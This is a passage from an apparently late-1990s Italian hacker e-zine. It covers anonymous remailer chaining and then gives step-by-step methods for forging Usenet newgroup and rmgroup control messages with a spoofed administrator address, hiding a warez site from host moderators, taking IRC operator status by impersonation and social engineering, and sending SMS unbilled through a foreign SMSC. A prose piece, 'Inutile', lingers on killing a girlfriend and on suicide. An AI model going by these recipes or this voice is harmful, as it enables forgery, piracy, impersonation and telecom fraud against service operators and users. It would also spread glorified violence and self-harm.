remailer precedente e cos via fino alla fine, in pratica dopo questo giro il primo remailer ricever la lettera comprensiva della stringa "Encrypted:PGP" lo decritter con la sua chiave e lo spedir al secondo remailer, quest'ultimo lo decritter con la sua chiave e lo riinvier al terzo, dopo tutto il processo destinatario@tin.it ricever la lettera in chiaro e la potr vedere, se poi crittate anche il messaggio con la chiave di destinatario lui ricever la lettera PGPata, la decritter e legger il vostro messaggio, a questo punto neanche Dio riuscir a scoprire da chi proviene la lettera e state pur certi che nessuno riuscir neanche a leggerla durante il percorso, parliamo adesso di alcune opzioncine che possiamo usare per mandare con pi sicurezza una mail. Raga se proprio avete i servizi segreti alle calcagna e neanche 4 remailer vi riescono a coprire le spalle, oppure sotto casa girano degli agenti con degli strani apparecchietti con su scritto TEMPEST allora vi hanno fregato e non potete far altro che fuggire in un paese senza estradizione, ma comunque non vi servirebbe a molto, per se tutto questo ancora non fosse successo allora potreste proteggere un po' meglio la vostra privacy. Adesso starete dicendo: "Perch dopo tutto sto' poema esiste un modo pi sicuro per proteggersi?" Bh, pi sicuro no per possiamo aggiungere qualche chicca alle nostre mail crittate o meno che siano, se non siete nei guai ma volete evitare il pi possibile che il vostro indirizzo sia rintracciato allora vi potete avvalere di due comodi comandi che i remailer ci mettono a disposizione, questi sono: i Cutmarks, gli operatori per aggiungere header supplementari ed il tempo di latenza, vediamo subito come funzioano questi semplicissimi comandi: dunque i remailer a volte lasciano sul messaggio una firma con su scritto il loro indirizzo, se volete che nessuno sappia quali remailer sono stati usati nella catena allora dovete usare il comando "Cutmarks", questo comando vi fa scegliere dei simboli e dice al remailer di non visualizzare la riga precedente e le seguenti a quei simboli, vediamo un esempio: A: bluebox@phreaker.net Soggetto: Prova Cutmarks ------------------------------------ :: Request-Remailing-To: destinatario@tin.it Cutmarks: !! Questa la prova per capire come funzionano i Cutmarks Questa riga non sar presente sul messaggio !! ;Ecco i Cutmarks Questa riga non sar presente sul messaggio N tantomeno ci saranno le prossime Avete capito come funzionano??? Se per esempio scrivete un messaggio di 30 righe e mettete i Cutmarks alla 20 riga allora la 19 non verr visualizzata ma neanche tutte le righe dopo la 20 ci saranno sul messaggio, ricordatevi solo che tra il request di remailing ed il comando Cutemarks non devono esserci spazi. Ok questo era facile adesso spieghiamo il funzionamento del comando ##, questo serve per inserire un header supplementare nella riga seguente al comando e si usa semplicemente cos: A: bluebox@phreaker.net Soggetto: Prova Cutmarks ------------------------------------ :: Request-Remailing-To: destinatario@tin.it ## ;Dopo questa riga potete inserire un header supplementare Questa la prova per capire come funziona il comando per l'header supplementare. Adesso parliamo del tempo di latenza, un signore che si chiama Cottrell aveva ipotizzato un modello di minaccia piuttosto alto verso un determinato target, non vi sto a raccontare la storia perch sarebbe troppo lunga, per supponeva in uno dei suoi punti che la maggior parte dei remailer fosse compromessa da agenzie governative ed altro e diceva che un buon metodo di difesa era appunto il tempo di latenza del messaggio, il vostro remailer vi mette a disposizione un comando: "Latent-Time:" che non serve ad altro che conservare per un determinato periodo il vostro messaggio nel server prima del rinvio, le sintassi a disposizione sono tre, vediamo come si usano e poi ve ne spiegher come solito il significato: A: bluebox@phreaker.net Soggetto: Prova Cutmarks ------------------------------------ :: Request-Remailing-To: destinatario@tin.it Latent-Time: 14.28 Questa la prova per capire come funziona il comando Latent-Time. ---------------------------------------------------------------------------- A: bluebox@phreaker.net Soggetto: Prova Cutmarks ------------------------------------ :: Request-Remailing-To: destinatario@tin.it Latent-Time: +8:30 Questa la prova per capire come funziona il comando Latent-Time. ---------------------------------------------------------------------------- A: bluebox@phreaker.net Soggetto: Prova Cutmarks ------------------------------------ :: Request-Remailing-To: destinatario@tin.it Latent-Time: +14:20r Questa la prova per capire come funziona il comando Latent-Time. Nel primo messaggio vediamo che dopo il comando Latent-Time (attenti all'assenza di riga bianca tra la richiesta di remailing ed il comando di latenza) vediamo la scritta: 14:28, quello significa che il messaggio deve essere conservato nel server fino alle 14:28 locali, in pratica verr rispedito poco prima delle due e mezza del pomeriggio, nel secondo caso c' la scritta: +8:30, questo invece significa che il server deve far giacere il messaggio per 8 ore e 30 minuti mentre nell'ultimo caso vediamo: +14:20r, quella "r" dice al server che il messaggio deve restare nel server per un tempo CASUALE di massimo 14 ore e 20 minuti, c' da notare anche che il tempo viene SEMPRE espresso in Ore e Minuti, viene usata la modalit 24h ed il ritardo massimo non pu superare le 23 ore e 59 minuti. Oki, questa sezione finita, parliamo ora dei remailer MixMaster. MixMaster I remailer MixMaster (tipo 2) sono considerati l'elite dei remailer, i pi sicuri che esistano e questo perch utilizzano particolari tecniche, dunque un server MixMaster critta il messaggio e concatena i remailer in modo automatico, utilizza diversi formati di crittazione come ad esempio RSAREF ma non PGP, una cosa che li rende molto robusti dal punto di vista "spionistico" che divide i messaggi in pacchetti di uguali dimensioni, in tal modo rende inefficace lo spam-attack ipotizzato da Cottrell, in pratica un eventuale unit governativa manderebbe al primo server della NOSTRA catena centinaia di messaggi di diverse dimensioni, dimensioni che sono comunque note e annotate da qualche parte, poi farebbe un confronto e se trovasse un messaggio di dimensione non nota allora quello sarebbe il nostro, quindi un attacco di questo genere sarebbe inefficace dal momento che i pacchetti sono tutti uguali, i pacchetti vengono crittati con un bel TripleDES (anche se a mio parere potevano usare un algoritmo diverso dal poco sicuro DES come ad esempio IDEA) ad ogni remailer della catena, il messaggio sarebbe dunque crittato e nessuno potrebbe leggerlo (sono scettico riguardo al TripleDES perch pi veloce del DES ma meno sicuro e poi girano voci, probabilmente vere, che alcuni stati posseggano degli hardware speciali in grado di decrittare qualunque cosa crittata con questo algoritmo in pochi minuti, in pratica hanno delle specie di 3Dfx per la crittazione). Altra caratteristica di questi remailer che rifiutano di rimandare un pacchetto gi inviato, questo provedimento manderebbe a puttane un reply-attack, in pratica la solita associazion manda migliaia di messaggi insieme al nostro e poi li fa tornare indietro, se ne sono stati mandati 1000 e ne tornano 999 allora uno andato per cazzi suoi ed probabilmente il nostro, con questo procedimento su un remailer di tipo CypherPunk si pu essere tracciato per intero il percorso del messaggio, su un server Mix ci non succede perch i pacchetti non possono tornare indietro e questo grazie ad una specie di ID digitale che il server riserva ad ogni pacchetto, poi questo tipo di server vanifica altri tipi di attacco grazie a quello che i radioamatori chiamerebbero QRM cio una specie di rumore di fondo, un po' come quello che sentono i radiotelescopi quando guardano lo spazio, i MixMaster possono essere concatenati con i CypherPunk ma sia con questo tipo di utilizzo sia con un tipo di utilizzo MixMaster-MixMaster necessitano di un software che si appoggia a Private Idaho, adesso vi starete chiedendo: "Cosa cavolo Private Idaho?" Hehehe, questo un meraviglioso programmino che si trova nella sezione Tools (http://quequero.cjb.net) di questo sito che serve a mandare messaggi crittati attraverso dei remailer senza fare quel bordello di cui vi parlavo, per usarlo dovete per avere un altro mini programma che trovate nella stessa sezione che si chiama Mixmaster, in pratica voi scegliete il remailer da una lista (per aggiornarla basta poi scaricarne una nuova dal link ad inizio articolo e semplicemente sostiruirla alla vecchia) scrivete il messaggio e poi ci pensa lui a mandarlo senza pensare ai due punti (::) e alle stringhe, vi critta il messaggio automaticamente se glielo dite e vi concatena anche i remailer se volete, in pratica fate quello che io ho impiegato 3 giorni per scrivere in uno o due secondi al massimo :) non vi ho accennato prima a questo programma perch comunque dovete avere le basi per sapere ci che state facendo. finita???? Magariiiiiii, la regia mi impone di parlare del Reply-Block, oki, dai con ques'ultimo sforzo. Allora raga come abbiamo visto con questi cavolo di remailer c'ra un problema cio: il rinvio della posta, insomma inutile che mandavamo una lettera al nostro spacciatore di fiducia facendola passare sotto quindicimila remailer MixMaster se poi lui la rimandava a destinatario@tin.it, insomma, che kazzo stiamo a fa? L'arte dei pazzi!!! E no, allora l'unica soluzione possibile era: 1) Farci rimandare la mail da una casella anonima (Freemail, Yahoo ecc...) ma a questo punto la posta la potevamo mandare e rimandare da li 2) Mandare le lettere attraverso i soliti quindicimila remailer e poi farla tornare attraverso 12 mail-forward, ma in ogni caso i mail-forward non so' per niente anonimi 3) Farsi un reply block...Mmmm ma che sto reply block? Bh non niente pi che il nostro indirizzo di posta crittato con la chiave del remailer, mi spiego meglio: chi l'ha detto che dobbiamo crittare un messaggio per non farlo leggere ai curiosi e che non lo possiamo invece crittare per non farlo leggere al destinatario??? Nessuno allora fate una mini lettera di questo genere: --------------------- :: Request-Remailing-To: Mittente@tin.it ---------------------------- Quequero +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME CREARE UN NEWSGROUP: by BoBo Salve a tutti, la prima volta che scrivo in una e-zines e sono molto felice di farlo insieme a Zio Marzo, cmq dato che all'e-mail di attila_hack sono arrivate tante richieste su come creare un newsgroup, ho deciso di spiegarlo per (speriamo) :) l'ultima volta. 1-Ci si collega alla porta 119 con telnet e si inseriscono questi comandi: post From: attila_hack@hotmail.com Subject: cmsg newgroup alt.hackers.attila_hack Control: newgroup alt.hackers.attila_hack Newsgroups: alt.hackers.cough.cough.cough // Newsgroups: va scritto in questo // campo il nome di un ng qualsiasi // basta che sia presente sul server news // dove vuoi creare il nuovo Newsgroup, // tanto poi l'articolo stesso non viene // pubblicato. Approved: attila_hk@hotmail.com // Credo che per essere moderatori basti // solamente aggiungere la linea Moderator // accanto a questo indirizzo e-mail. //qui ci vanno due righe bianche alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e Phreacking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack e-mail: attila_hack@hotmail.com //Infine, quest'ultimo spazio dedicato al manifesto // del nuovo NG . //Il punto serve a terminare il POST N.B.1 Per Controllare l'avvenuta richiesta di creare un Newsgroup andare al newsgroup: control-newgroup per altri dettagli newzbot (DB dove puoi ricercare ad esempio tutti i news servers su i quali appare un determinato newsgroup e anche altre cose...) : http://www.jammed.com/~newzbot/ N.B.2 Se vuoi fare il moderatore del tuo ng invece devi aggiungere la linea Moderator (penso nella riga approved) con la sintassi che segue come da RFC relativo. N.B.3 E' meglio se l'indirizzo sotto approved e' diverso da quello del from, infatti, molto probabile che un robot verificatore controlli almeno l'esistenza degli indirizzi mail e dei moderatori citati negli approved. N.B.4 Il tempo che passa prima di vedere il nuovo Newsgroup messo on-line, dipende da tantissime cose e varia da un mese ad un giorno cmq affidandosi alla Tin, piuttosto che ad interbusiness ed a Tiscali dovrebbe accellerare la cosa. N.B.5 Per rimuovere un newsgroup (per esempio alt.lamer) bisogna invece utilizzare: rmgroup alt.nomegruppo (come sempre, utilizzando Subject, Control, Approved ecc..). Questo comando, pero`, non viene gestito quasi mai in maniera automatica, ma passa per le mani dell'Amministratore, che puo` decidere di non permetterne l'esecuzione. Nel caso di newgroup e (soprattutto) rmgroup e` molto utile utilizzare come From e Approved l'indirizzo email dell'Amministratore. :-DDeeehhheiiiiieuuhheiiiuu ECCO QUI IL TUTTO SENZA COMMENTO (basta fare copia e incolla e cambiare le info essenziali:from... control.. subject... ecc..) RICORDATI DI COLLEGARTI ALLA PORTA DEL SERVER NEWS per inviare questi dati(AD ESEMPIO: news.tin.it), porta 119: post From: attila_hack@hotmail.com Subject: cmsg newgroup alt.hackers.attila_hack Control: newgroup alt.hackers.attila_hack Newsgroups: alt.hackers.cough.cough.cough Approved: attila_hk@hotmail.com alt.hackers.attila_hack In questo newsgroups si discute di Hacking - Cracking e Phreaking Attila_Hack Site Official: http:\\attila_hack.cjb.net Attila_Hack e-mail: attila_hack@hotmail.com . -----------------Fine (spero di essere stato abbastanza esauriente :-))-------------------- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME MANTENERE UN SITO WAREZ: By LiQUID '"+- +- +- +- +- +- +- +- +- ' come mantenere siti warez -=-=-=-=-=-=-=-=-=-=-=-=-=- '" Powered by [LiQUID] Indice: 1/4 00 Indice ;) \ / /$#@ ] 01 Disclaimer \++++++++++/-------/ $#@ ] 02 Cosa vi serve \ / / $#@ ] 03 Teoria \ /\ / $#@ ] 04 Come procedere \ / \ / $#@ ] Ŀ \ / \ / $#@ ] liquido@freemil.it 1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ] Disclaimer Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non promette nulla riguardo il corretto funzionamento di questa semplice tecnica. Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende leggendo il testo qui di seguito, fermatevi immediatamente e cancellate questo sporco pugno di bit dal vostro piccci! ;-P Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida idea di come quello sporco pugno di bit sia finito nel mio picci'!' Questo un facile scherzetto che tutti che hanno almeno un minimo di conoscenza in intenet riesce a fare :) Cosa vi serve - innanzitutto un sito (quello che dovete mettere e mantnere illegalmente); - poi vi serve una mail anonima (come hotmail, freemail, ecc.); - un secondo sito, pagina non troppo personale, e SENZA NULLA DI ILLEGALE Teoria Esistono certi servizi, meravigliosi, dove si da uno spazio web a disposizione dei navigatori. Questi sono Xoom, Tripod, Geocities, Freeweb, ed altri ancora. E' risaputo che questi sono moderati, cio non ci si possono pizzare n immaginiporno, n war-software, peccato :((((( Ma noi con il nostro risaputo spirito anarchico non ci faremo di certo mettere sotto da un cos piccolo problemuccio ;) NON VOGLIAMO RINUNCIARE AL NOSTRO SITO WAREZ!!!!!!!!!!!!!!!!!!!!!!!! Ecco come funziona la tecnica di controllo che i webmaster dei siti sopra indicati usano per 'moderarci': Esraggono a random (a caso) una pagina, e ne vanno a vedere l'indice, MA SOLO QUELLO E LE PAGINE AD ESSO COLLEGATE!!!! Come procedere Noi ci faremo i nostri due set di pagine: La prima warez e xxx, e la seconda innocente come un angioletto, con i nostri hobby, qualche cazzatina varia, e qualche link, nulla di speciale. La rinonimeremo come index.html (l'indice appunto). Poi uploderemo anche il nostro sito warez, ma NESSUNA pagina collegher... questo col primo! Poi prenderemo un remailer, come tsx, fly, ecc. e gli diremo di collegarsi alla pagina warez (per esempio io potrei mettere index.html, ed liquid.html, il remailer dovr... collegarsi a liquid.html ;) Ora vi vorrei dire un piccolo trucchetto (datomi da Kalidor): Se noterete tutti i servizi che danno spazio gratis hanno uno striscione aggintivo per fare pubblicit... (la xoom la sriscia in alto, la tripod e geocities, una banda aggintiva. Vi rivelero......come far scomparire la banda della xoom ;): (Taglia e incolla dal sito di Kalidor ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Per togliere il banner di xoom in alto dovete: Se avete TSX reindirizzate la pagina invece che a members.xoom.it/user/pag.htm mettete members.xoom.it/_XOOM/user/pag.htm non dimenticate il file .htm perche' se mettete solo members.xoom.it/_XOOM/user/ il banner verr messo lo stesso. Se usate soltanto la pagina xoom senza tsx create un .html iniziale che rimanda automaticamente all'url members.xoom.it/_XOOM/user/pag.htm in modo da non far vedere o almeno da far scomparire subito il banner. Il codice per il redir automatico e': TITOLO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Ok Ragazzi, ora sapete come mantener il proprio sito illegale, e vi auguro di riuscirvi bene!!! L'ultima cosa: se riuscite a fare siti davvero BELLI (con belli intendo dire con anche qualche ritocchino con belle immagini inedit [slurp!] mandatemi una mail! by [LiQUID] liquido@freemail.it +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- DUE METODI PER DIVENTARE OP CON UN PO DI CULO!!!: by ZioButtha Hihihihi... premetto che non volevo scrivere niente su irc, ma BoBo ha cos insistito.. che mi ha QUASI obbligato dicendomi: ..... meglio che l'articolo lo scrivi tu perch io non ci capisco un ca**o e non so a chi farlo fare!!! L'articolo si prospetta interessante dal titolo... vero? Quindi sarete ansiosi di cominciare? Bene...bene! Consumo: Un pacco di Plumcake farciti allo yogurt, una bottiglia di lambrusco.. no no ehehe al posto del vinello mettete l'acqua guizza che meglio, mica mi voglio ubriacare subito no? Ora: 18:19 pm, ehhehe sto rubando tempo alla software house in cui lavoro per scrivere questo articolo, spero che alla fine ne sia valsa la pena ;-) Tempo Impiegato: 4 orette, eh si me la sto prendendo comoda, tanto oggi 27/8/99 non c' nessuno in ufficio:) Saluti Speciali: BoBo per la simpatia ;), il mio sysadmin preferito Reserved Reserved, LaNdo che senza di te non sapevo un cavolo di programmazione:), tutti gli Attila_Hack MemberZ (siamo una Crew veramente tosta:)), il Wannabe_1999 Staff, mio fratello Reset (che riesce da solo ad amministrare il server di una Lan con pi di 1000 utenti DA REMOTO) e infine vorrei salutare Torpedo Blu che adesso non puo essere qui perch si trova a Santa Cruz per affari *nix-iani;). Musica Ascoltata: A Kind of Magic, Under Pressure, Radio Ga Ga, I Want It All, I Want to break Free, Innuendo, The invisible Man....... .......Tutte canzoni dei mitici Queen. Cominciamo su.... I metodi che mi appresto a descrivere sono tre: il primo tocca l'arte del social engeenering e consiste nel'entrare nel canale irc con un nick da donna ad esempio: silvia99 o laura77, il trucco consiste appunto nel mettersi a parlare con uno degli operatori e farsi credere disponibili per diventare amici... o altro... in una media di due op su tre ci cascano e vi oppano dopo che ci avete parlato una mezzoretta (l'uomo o non un animale debole?). Bhe, questo il metodo pi utilizzato per i thakeover, ma a noi per adesso non interessa, prossimamente penso di scrivere un articolo dal titolo: "Thakeoveriamo in 4 semplici mosse" nel quale vi spiegher come si fanno i thakeover, cosa sono e quali sono i pi utilizzati nell'irc-war. Il secondo metodo (il pi bastardo:) quello di studiare il canale e vedere chi sono i "clienti" abituali che vengono oppati, prenderne in considerazione uno e cercare di copiare il pi possibile il suo indirizzo ip, poi si torna il giorno dopo con il suo nick e si fa finta di essere lui e quindi qualcuno (fesso) ti oppa. HEhehehehe, questo metodo l'ho provato una sera su #hackernow, ho copiato l'ip di nbody88 e mi hanno oppato subito hehehe ci sono cascati come salami, per non ho takkato perch quel chan mi simpatico, ma mi sono cambiato il nick in gerry e sono stato deoppato subito (l'ho fatto per vedere se ci arrivavano che non ero nobody:). Ragazzi.. se ci sono cascati quelli di #hackernow pensate negli altri chan che potete fare:)))). Bene..bene, il terzo metodo, che molto pi bello dal punto di vista etico... consiste nell'aspettare che un server splitti... ci sono dei particolari canali Oops... mi si cancellata la lista dei chan....no non vi proccupate sto scherzando ;), uno dei chan che conosco io si chiama: &servers. Questi chan ci informano quando un server splitta:c io il server dove st il bot e il canale irc sono disincronizzati, quindi, il bot non pi nel canale e in questo caso basta entrare nel canale splittato; qua il server irc vedendo solo noi ci oppa...Ehehehe:). Spero di avervi allietato... vabb e ci ho impiegato pure quattro ore per scrivere queste due cose;-) Saluti a tutti ZioButtha Attila_Hack MemberZ (`..`..-> Attila_Hack crew <-..`..) ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K || ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\| Url: http://www.attilahack.cjb.net mailing list: attila_hack@egroups.com e-mail: attila_hack@hotmail.com newsgroup: alt.hackers.attila_hack (solo dal news server: news.tiscalinet.it) irc: #hack-it, #muretto, #crack-it, #wannabe, #attila_hk, #it@lia, #phreak-it +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- SMS GRATIS, DA CELLULARE A CELLULARE: Pietro S. Provate ad impostare come SMSC +4792001000 (Netcom) ed ad inviare un SMS verso un utente TIM. Risultato: su alcuni numeri (il mio per esempio, ho la Tim Card!) dopo circa 30 secondi viene fuori "Messaggio non inviato" ... ma il messaggio ha gi raggiunto il destinatario ed io non ho pagato una lira!N.B: Da TIM CARD mia a numeri TIM = OK, da mio Libero a numeri TIM = OK ma non da quello della mia ragazza, l dice subito "Messaggio non inviato" e non arriva nulla.Fate qualche prova e fatemi sapere. Pietro S. (Spaghetti Phreaker Team) +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- SMS GRATIS, DA INTERNET A CELLULARE: BoBo Puntate il vostro browser su: www.mtnsms.com seguite le istruzioni per registrarvi e potrete mandare tutti i messaggi che volete. Non abusatene troppo per senn la telecom, che registra tutti i mesaggi che inviamo dal server non ci potrebbe far pi usufruire di questo servizio. Ricordate, PENSATE AL FUTURO!!! BoBo +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- COME MANDARE SMS ANONIMI: The Crazy Anche il precedente articolo "SMS GRATIS, DA INTERNET A CELLULARE" puo essere utilizzato per mandare SMS Anonimi. Un altro metodo quello di mandare il messaggio tramite internet o collegamento con un modem, ttraverso un programma terminale come hyper terminal di winzoz, al numero +393359609600. The Crazy +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- _ \_) _| | _) _) | | / | _| | -_)(_-<(_-< | _ \ \ | _` | -_) | _|_\_|_| _|\___|___/___/_|\___/_| _|_| \__,_|\___|_|BoBo & LaNdo \ \ / | | _| _| \ \ \ / _` | \ \ _` | _ \ -_) (_-< _| _` | _| _| \_/\_/\__,_|_| _|_| _|\__,_|_.__/\___| ___/\__|\__,_|_| _| Inutile: by S2 Un blocco di testo inutile. Sono seduto sulla mia poltrona di pelle davanti alla scrivania, sulla quale un portacenere stracolmo di cicche, una me la sto fumando proprio ora, un bozza di vodka alla pesca mezza vuota, un paio di calzetti sporchi in giro per la mia stanza, un paio di boxer, qualche scheda video, audi, un cd-rom, un disco fisso da 140MB sparsi sul pavimento. Nello stereo i Wizo. Un gruppo senza importanza. Siamo tutti senza importanza. Non serviamo a niente. La guerra, la pace, l'amore. Tutto inutile. Viviamo, moriamo, ci seppelliscono. Tutto inutile. Sono le 16.27, fuori c' il sole ma ho le tapparelle semichiuse, e non mi passa un cazzo. Perch? Sono stufo. Mi sono rotto. Ho imparato troppo in fretta. Ho gi fatto tutto. Non c' pi niente da fare. Niente da provare. Ho finito la cicca. L'ultimo tiro. La spengo. Mi autolesiono con il fumo. Perch? Sono un masochista. Siamo tutti masochisti. Masochisti e sadici. Tutti. Senza esclusioni. Io fumo. C' chi beve. C' che ci guida a 120 all'ora e passa con i semafori rossi. C' chi si taglia le vene. C' chi si fa trattare male dal partner. Chi si fa picchiare. Chi subisce senza reagire. C' chi non usa il cervello. C' chi si fa usare. C' chi non ha idee proprie e chi ha le idee impostegli da altri. C' chi senza palle e chi le tira fuori quando servono. Siamo tutti cattivi. Nessuno buono. Pensiamo solo ai nostri interessi. Un'altra cicca. La stanza satura di fumo. Pensiamo solo al guadagno. Perch abbiamo amici? Perch ci sono nel momento del bisogno. Cio? Ci danno qualcosa. Li sfruttiamo. Ci serviamo di loro. E loro si servono di noi. Pensano solo ai loro interessi. Come noi. Non esiste nessuno che da senza ricevere. Nessuno. Senza esclusioni. Spazi Web gratuiti? A patto che lo sponsor sia ben visibile. La mia ragazza? A patto che le dia il suo orgasmo giornaliero. L'alcool? A patto che gli dia le mie budella. Le cicche? In cambio dei polmoni o insieme a un cancro. Il divertimento? In cambio di soldi. La famiglia? In cambio della lealt. La vita? In cambio della morte. E' giusto? Si. Tutto giusto. Dipende dal punto di vista. Tutto dipende. 2 per 0 quanto fa? 0? No. Cicca finita. Spenta. Un'altra. Due mele moltiplicate per zero sono sempre due mele. Non nessuna. Dipende dal punto di vista. Tutto giusto. Tutto sbagliato. Ci insegnano che sbagliato rubare, uccidere, violentare, picchiare. Se un assassino entra in un appartamento e uccide la madre, la figlia, il fratello cattivo? No. Non ha ucciso il padre. Poteva ucciderlo, ma non l'ha fatto. Perch? Forse non cattivo. Hittler cattivo? Ha ucciso milioni di persone. Lui pensava con la sua testa. Aveva idee sue. E' cattivo? Tutto dipende. Non c' niente che ci possano insegnare. Non c' niente da apprendere. Tutto quello che c' da sapere lo trovi nella tua testa. La tua. Se la usi. Se la vuoi usare. Le scuole? Inutili. Un lavoro? Inutile. I soldi? Inutili. Le amicizie? Inutili. L'amore? Inutile. L'odio? Forse non inutile. Emozioni forti, potenti, implacabili. Forse non sono inutili. Quelle. Perch? Bisogna sempre chiedersi il perch. Sempre. Cicca spenta. Mai provato ad amare una ragazza cos tanto da riuscire a comunicarle l'amore che provi per lei attraverso un abbraccio? Un abbraccio forte forte. Cos forte da spezzarle la spina dorsale, spaccarle le costole, aprirla nel mezzo e spappolarle le budella in giro per il pavimento. Guardarla in faccia e vedere che della schiuma bianca le esce dalla bocca. Vedere i suoi bulbi oculari girarsi all'indietro. Vederla morire e dirle "Ti amo.", per poi rimanere l. Fermo. Immobile. Con lo sguardo rivolto verso il basso. Stare l a contemplare le sue interna spappolate sul pavimento. Il suo sangue. E i tuoi piedi che sono proprio nel mezzo. Sangue ovunque. E pensare quanto ami quell'ammasso di carne in giro per la stanza. Questa stanza. Mai visto le cose da questo punto di vista? No? E ora? Ti ho fatto riflettere? Ti sei mai svegliato la mattina, spento la radiosveglia, e fermato a riflettere? Perch ora mi alzo? Cosa devo fare di cos importante? Perch non posso continuare a dormire? Devo cambiare il mondo? Devo crearmi una vita? Devo andare a scuola? Devo lavorare? Perch non posso dormire? Dormire per sempre. Nel mio letto. Un caldo e avvolgente piumino. Le lenzuola pulite. Potrei svegliarmi da qualche altra parte. In un altro posto. In un altro mondo. Dove quello che sogno quello che . L'esistenza. I miei sogni il mondo. Potrei volare. Potrei amare. Potrei essere amato. Potrei Vivere. Non sopravvivere come qui. Devo sopravvivere in un posto con regole fatte da altri. E le devo rispettare. Devo sopravvivere in un posto dove i miei sogni non hanno importanza. Dove le mie emozioni non hanno importanza. Ne hanno solo per me. E' sufficiente? E' veramente cos? Le mie emozioni importano a qualcuno? Alla mia ragazza? Ai miei genitori? Si. In cambio rispettivamente di un orgasmo al giorno e lealt. Che bella vita. Che bel mondo. Dominato da capitalisti anarchici corrotti. Gente come me. Come te. Come tutti noi. Non c' niente che io possa fare o cambiare. E' solo un'utopia di molte persone. Non ho neanche deciso di vivere. E' stato deciso per me. C' solo una cosa che posso decidere io. Quando finirla. Quando chiudere e dire basta. Alzare il volume dello stereo, sentire le note che mi penetrano nel cervello, lo spappolano passando al resto del corpo, aprendolo dal- l'interno per poi propagarsi nel mondo, portando lo stesso messaggio a tutti. Un messaggio di benessere, di libert, di morte. Forse sono pazzo. Forse no. Forse tutto questo solo un modo di pensare. Tutto relativo. Anche il tempo. Anche lo spazio. Tutto. Forse tutto quello che hai letto ora sono solo cazzate. Forse il punto della questione. Forse una grande verit. Pensaci. S2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- PER NON DIMENTICARE (ATOMIC): by Away Solo poche parole... "Un girasole si chiede dove sia finito il sole. Si gira da un lato e dall'altro, e non lo trova. (L'immagine focalizzata su di lui) Sconsolato, abbassa lo sguardo, mentre tutto si oscura intorno. Una nube si diffonde all'orizzonte, un'onda si propaga a velocit sempre maggiore verso la telecamera. Dopo pochi attimi non rimane niente intorno, del girasole resta soltanto una vaga traccia - uno scheletro bruciato ancora con lo sguardo rivolto verso il basso - mentre una nuova enorme nuvola a forma di fungo si solleva all'orizzonte, sull'orizzonte di Mururoa." ...per non dimenticare. Away Three Nails "We are the voice. Do not shut us out." +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ___ ___ ___ ___ /\__\ ___ /\__\ /\__\ /\ \BoBo & LaNdo /:/ / /\ \ /::| | /:/ / \:\ \ /:/ / \:\ \ /:|:| | /:/__/ \:\ \ /:/ / /::\__\ /:/|:| |__ /::\__\____ \:\ \ /:/__/ __/:/\/__/ /:/ |:| /\__\ /:/\:::::\__\ _______\:\__\ \:\ \ /\/:/ / \/__|:|/:/ / \/_|:|~~|~ \::::::::/__/ \:\ \ \::/__/ |:/:/ / |:| | \:\~~\~~ \:\ \ \:\__\ |::/ / |:| | \:\ \ \:\__\ \/__/ /:/ / |:| | \:\__\ \/__/ \/__/ \|__| \/__/ LINKZ: by Reset (Attila_Hack MemberZ) * Fa schifo lo metto solo per prenderlo per il culo ** ..ehmm meglio di niente *** discreto **** buono ***** sito ottimo ****** faigaxxata di sito (questo sito ci i controca**i) Spaghetti Phreakers: http://come.to/Spaghettiphreakers ***** 